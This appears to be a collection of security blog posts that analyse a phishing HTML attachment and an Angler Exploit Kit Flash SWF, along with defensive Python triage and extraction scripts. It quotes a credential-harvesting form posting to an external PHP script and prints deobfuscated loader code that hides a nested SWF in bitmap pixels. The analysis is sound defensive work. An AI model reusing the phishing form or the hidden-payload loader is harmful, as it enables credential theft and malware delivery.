
Tuesday, February 21, 2017

Customs Banned Goods Adobe Phish

Adobe Phish

From: "CUSTOMS SERVICES"

Attachment: BANNED GOODS.html (md5 e1e0e1d1720dbcc536c2f596d76627d9, VirusTotal 19/55)

Body: PLEASE FIND THE ATTACHED LIST OF NEWLY BANNED GOODS BY THE GOVERNMENT

Opening the attachment shows a fairly convincing page (pic below) whose background makes it look like you are inside Adobe Reader rather than a browser.

It contains the following. Note the brand mismatch (an Adobe Reader look-alike whose alert claims the document is secured by Microsoft) and the form that posts the captured credentials to a third-party PHP script:

alert .... Document is Highly Secured by Microsoft INC. Requires Email Authentication: Kindly Sign in with your correct email and password to view Document
title ... PDF Online
form method ... POST ... action= hxxp://send.akataali[.]us/pdnew.php
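The manual inspection above (alert text, page title, form action, password field) can be automated for triage of an HTML attachment. The following is an added example, not code from the original post; the markup of SAMPLE_HTML is constructed here and only the quoted strings come from the post. It uses the standard library only, and refangs the defanged indicator before parsing so urlparse sees a real hostname.

```python
"""Triage an HTML e-mail attachment for credential-harvesting indicators.

Added example, not part of the original post. Reimplements the manual
inspection (alert text, <title>, form action, input types) as a script an
analyst can run against a saved .html attachment.  Standard library only.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the markup is invented for this example, the strings
# (title, alert text, form action) are the indicators quoted in the post.
SAMPLE_HTML = """<html><head><title>PDF Online</title>
<script>alert("Document is Highly Secured by Microsoft INC. Requires Email Authentication: Kindly Sign in with your correct email and password to view Document");</script>
</head><body>
<form method="POST" action="hxxp://send.akataali[.]us/pdnew.php">
<input type="text" name="email"><input type="password" name="passwd">
<input type="submit" value="View Document"></form></body></html>"""

ALERT_RE = re.compile(r"""alert\s*\(\s*(['"])(.*?)\1\s*\)""", re.S)
DEFANG = (("hxxp", "http"), ("[.]", "."), ("[:]", ":"))


def refang(url):
    """Undo common defanging so urlparse can extract the hostname.
    (urlparse treats '[' as an IPv6 bracket otherwise.)"""
    for bad, good in DEFANG:
        url = url.replace(bad, good)
    return url


class AttachmentParser(HTMLParser):
    """Collect <title> text, <form> method/action, <input> types and raw
    <script> bodies; HTMLParser hands script content to handle_data."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.forms = []        # (method, action) pairs
        self.input_types = []
        self.scripts = []
        self._tag = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        self._tag = tag
        if tag == "form":
            self.forms.append((a.get("method", "GET").upper(), a.get("action", "")))
        elif tag == "input":
            self.input_types.append(a.get("type", "text").lower())

    def handle_endtag(self, tag):
        self._tag = None

    def handle_data(self, data):
        if self._tag == "title":
            self.title += data.strip()
        elif self._tag == "script":
            self.scripts.append(data)


def triage(html):
    """Return extracted indicators plus a list of findings and a verdict."""
    p = AttachmentParser()
    p.feed(html)
    alerts = [m.group(2) for s in p.scripts for m in ALERT_RE.finditer(s)]
    findings = []
    if "password" in p.input_types:
        findings.append("password field in a locally opened HTML file")
    for method, action in p.forms:
        host = urlparse(refang(action)).hostname
        if host:
            findings.append(f"form {method}s credentials to external host {host}")
    if any(re.search(r"sign in|password|authentication", a, re.I) for a in alerts):
        findings.append("alert() lures the user to authenticate")
    return {
        "title": p.title,
        "alerts": alerts,
        "forms": [(m, refang(a)) for m, a in p.forms],
        "findings": findings,
        "verdict": "credential phish" if len(findings) >= 2 else "review manually",
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

The verdict threshold (two or more independent indicators) is a deliberately simple heuristic; a password field alone is not proof, but a password field plus a form action on a host unrelated to the sender is the pattern this attachment shows.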




More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Thursday, June 2, 2016

Partial Deobfuscation of an Angler EK SWF

I made an attempt to deobfuscate and analyze a malicious Adobe Flash SWF file from the Malware Traffic Analysis blog post about the Angler Exploit Kit. I ran through the steps I described previously to export the file from the PCAP and turn the SWF into ActionScript code.

I ended up with this ugly obfuscated mess of ActionScript code. Below is just a sampling; the full obfuscated ActionScript code is here.

var _local1:* = new ((this.1[IlllI.11IIlI1lIl](IlllI.I11lI1IlI1) as Class))();
var _local2:* = new this.ll1IlI1II1lI()[IlllI.1lIlI1lI];
var _local3:int = _local2[IlllI.1lIIlI1lI1];
var _local4:int = _local2[IlllI.Ill1lI1];
var _local5:uint;
var _local6:uint = (10 - (5 * 2));
var _local7:int;
while (_local7 < _local3) {
  _local8 = 0;
  while (_local8 < _local4) {
   _local9 = _local2[IlllI.11lIlI](_local7, _local8);
   if ((((_local7 == 0)) && ((_local8 == 0)))){
     _local5 = (_local9 & 0xFFFFFF);
   }


I thought I'd take a stab at de-obfuscating this code, and I think I was reasonably successful at unraveling the first layer of obfuscation. I pasted the partially deobfuscated code here and review some of it below. I deobfuscated it by renaming variables and functions, removing unnecessary variable declarations and string concatenations, removing unnecessary nested function calls, and so on.

public class Document extends MovieClip {
   public function Document(){
    super();
    if (this["stage"]){
      this.functionStartExploit();
    } else {
      this["addEventListener"]("addedToStage", this.functionStartExploit);
    };
   }


Per the above code, when the SWF file loads in the user's browser it does the standard start for a Flash file: it checks whether the stage (the main display area of the SWF) is available yet, and if not it adds a listener that fires as soon as the object has been added to the stage. Once that has happened the attacker starts the exploit.

public function functionStartExploit():void{
   this["removeEventListener"]("addedToStage", this.functionStartExploit);
   var _localEmbeddedSWF:* = new flash.display.Loader();
   _localEmbeddedSWF["loadBytes"](this.functionEmbeddedSWFFromBitmap());
   this["addChild"](_localEmbeddedSWF);
}


First the attacker removes the stage listener, since it has already fired. Then the attacker creates a Loader as a placeholder for a nested SWF file (yes, there is essentially a SWF within a SWF). The initial layer of obfuscation was the renaming of variables, the unnecessary string concatenations and so on. But there is a second layer of obfuscation: an embedded SWF is loaded inside this one via loadBytes. So the actual exploit isn't in the SWF I'm analyzing but in a nested one that appears to have been hidden in a Bitmap, as you'll see below. Once the embedded SWF has been loaded, the Loader is added as a child of this SWF so that the nested content runs as well.

private function functionEmbeddedSWFFromBitmap(){
   var _localMaliciousByteArray:* = new flash.utils.ByteArray();
   var _localBitmap:* = new BitmapAsset()["bitmapData"];
   ...
   while (_localCounter2 < _localBitmap["width"]) {
     while (_localCounterNested < _localBitmap["height"]) {
       _localPixel = _localBitmap["getPixel"](_localCounter2, _localCounterNested);
       ...
       _localMaliciousByteArray["writeByte"]((_localPixel & 0xFF));
       _localMaliciousByteArray["writeByte"](((_localPixel >> 8) & 0xFF));
       _localMaliciousByteArray["writeByte"](((_localPixel >> 16) & 0xFF));
       ...
       _localCounterNested++;
     };
     ...
     _localCounter2++;
   };
   ...
   _localMaliciousByteArray["position"] = 0;
   return (_localMaliciousByteArray);
}


Finally, in the function above that rebuilds the embedded SWF from the bitmap, the code walks the image column by column (outer loop over width, inner loop over height), reads each pixel with getPixel, and writes its 24-bit value out as three bytes: the low byte, then the middle byte, then the high byte. The elided portions do some additional manipulation of the bytes before the ByteArray position is reset to 0 and the array is returned to be loaded into the nested Loader.
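Because the extraction loop is deterministic, an analyst can reimplement it and pull the nested SWF out of the bitmap statically, without ever running the Flash file. The following is an added example, not code from the Angler sample or the original post: it mirrors the getPixel/writeByte loop quoted above in Python and carves the result by the SWF header's declared length. The bitmap, the encoder that builds it and the stand-in payload are constructed here; the sample's elided byte manipulation ("...") is unknown and is not modelled.

```python
"""Recover a payload hidden in bitmap pixel data.

Added example, not code from the Angler sample or the post.  Reimplements
functionEmbeddedSWFFromBitmap's loop: iterate columns (outer) then rows
(inner) and emit the low, middle and high byte of each 24-bit pixel.
"""
import struct

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")


def embed_bytes_in_pixels(payload, width):
    """Constructed encoder (assumption for this example) that packs 3 bytes
    per pixel in the column-major order the extraction loop expects.
    Returns ({(x, y): 0xRRGGBB}, width, height), height rounded up."""
    padded = payload + b"\x00" * (-len(payload) % 3)
    pixels_needed = len(padded) // 3
    height = -(-pixels_needed // width)          # ceil division
    grid = {}
    for i in range(width * height):
        x, y = divmod(i, height)                 # x advances slowest
        chunk = padded[3 * i:3 * i + 3] if i < pixels_needed else b"\x00\x00\x00"
        low, mid, high = chunk
        grid[(x, y)] = (high << 16) | (mid << 8) | low
    return grid, width, height


def extract_bytes_from_pixels(grid, width, height):
    """Mirror of the ActionScript: for each (x, y), getPixel, then
    writeByte(p & 0xFF), writeByte((p >> 8) & 0xFF), writeByte((p >> 16) & 0xFF)."""
    out = bytearray()
    for x in range(width):
        for y in range(height):
            p = grid[(x, y)] & 0xFFFFFF
            out.append(p & 0xFF)
            out.append((p >> 8) & 0xFF)
            out.append((p >> 16) & 0xFF)
    return bytes(out)


def carve_swf(data):
    """Find an SWF signature in the recovered bytes and trim the blob to the
    file length declared in header bytes 4..7 (little-endian uint32),
    dropping the padding the pixel grid adds.  Returns None if no SWF."""
    for magic in SWF_MAGICS:
        idx = data.find(magic)
        if idx != -1 and len(data) >= idx + 8:
            length = struct.unpack_from("<I", data, idx + 4)[0]
            return data[idx:idx + length]
    return None


# Constructed stand-in for the nested SWF: a valid uncompressed header
# (signature, version 10, total length) followed by arbitrary body bytes.
BODY = b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x18\x01\x00"
FAKE_SWF = b"FWS" + bytes([10]) + struct.pack("<I", 8 + len(BODY)) + BODY

if __name__ == "__main__":
    grid, w, h = embed_bytes_in_pixels(FAKE_SWF, width=4)
    recovered = carve_swf(extract_bytes_from_pixels(grid, w, h))
    print("recovered nested SWF intact:", recovered == FAKE_SWF)
```

With a real sample the grid would come from the bitmap asset exported by the decompiler (any image library that yields per-pixel RGB values will do); the point is that the loop order and the byte order (low byte first) must match the ActionScript exactly, otherwise the recovered file will not start with a valid signature.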

I found it interesting to see this nested obfuscation technique in action. It definitely makes analysis harder for a security researcher, because the exploit you're looking for isn't actually present in the SWF file you spotted.


Decompile an Adobe Flash SWF File

If you were analyzing a malicious Adobe Flash SWF file, such as the ones mentioned in Brad's Malware Traffic Analysis blog about the Angler Exploit Kit, you might be wondering what's actually a good way to analyze that SWF, since it's already compiled and unreadable. First, remember that if you have a PCAP containing the SWF you need to Export HTTP Objects from it, as covered in a previous post. Once you have the SWF file it's quite easy to decompile it and get some Adobe ActionScript code to review. You could use any free online decompiler, such as showmycode.com, to upload the SWF and it will immediately spit out some ActionScript. Keep in mind that uploading a sample to a public service shares it with a third party (and potentially with the attacker watching for it); an offline decompiler such as the JPEXS Free Flash Decompiler gives the same ActionScript without that exposure.
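Before handing a file to a decompiler it is worth checking what the first eight bytes say: the three-byte signature tells you whether the body is uncompressed (FWS), zlib-compressed (CWS) or LZMA-compressed (ZWS), and bytes 4..7 give the declared uncompressed length. The following is an added example, not part of the original post; the sample bytes are constructed here, and ZWS files are identified but not inflated.

```python
"""Inspect an SWF container and normalize CWS (zlib) to FWS.

Added example, not part of the original post.  In a CWS file only the
body after byte 8 is deflated; the 8-byte header stays uncompressed and
the declared length is the length of the fully inflated file.
"""
import struct
import zlib

COMPRESSION = {"FWS": "none", "CWS": "zlib", "ZWS": "lzma"}


def parse_swf_header(data):
    """Return signature, version, declared length and compression type,
    or raise ValueError if the bytes are not an SWF."""
    if len(data) < 8 or data[:3] not in (b"FWS", b"CWS", b"ZWS"):
        raise ValueError("not an SWF: signature %r" % data[:3])
    sig = data[:3].decode("ascii")
    return {
        "signature": sig,
        "version": data[3],
        "declared_length": struct.unpack_from("<I", data, 4)[0],
        "compression": COMPRESSION[sig],
    }


def swf_to_fws(data):
    """Return an uncompressed (FWS) copy of the file.  FWS input is returned
    unchanged, CWS is inflated and length-checked, ZWS is rejected."""
    hdr = parse_swf_header(data)
    if hdr["signature"] == "FWS":
        return data
    if hdr["signature"] == "CWS":
        body = zlib.decompress(data[8:])
        out = b"FWS" + data[3:8] + body
        if len(out) != hdr["declared_length"]:
            raise ValueError("declared length %d but inflated to %d bytes"
                             % (hdr["declared_length"], len(out)))
        return out
    raise NotImplementedError("ZWS (LZMA) is not handled in this example")


# Constructed samples: an uncompressed SWF with an arbitrary body, and the
# same file in CWS form (header kept, body zlib-compressed).
FWS_BODY = bytes(range(32)) * 4
FWS_SAMPLE = b"FWS" + bytes([13]) + struct.pack("<I", 8 + len(FWS_BODY)) + FWS_BODY
CWS_SAMPLE = b"CWS" + FWS_SAMPLE[3:8] + zlib.compress(FWS_BODY)

if __name__ == "__main__":
    print(parse_swf_header(CWS_SAMPLE))
    print("round trip ok:", swf_to_fws(CWS_SAMPLE) == FWS_SAMPLE)
```

A mismatch between the declared length and the inflated size is worth noting in itself: it usually means a truncated export from the PCAP or a file that was deliberately tampered with, and either will confuse a decompiler.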
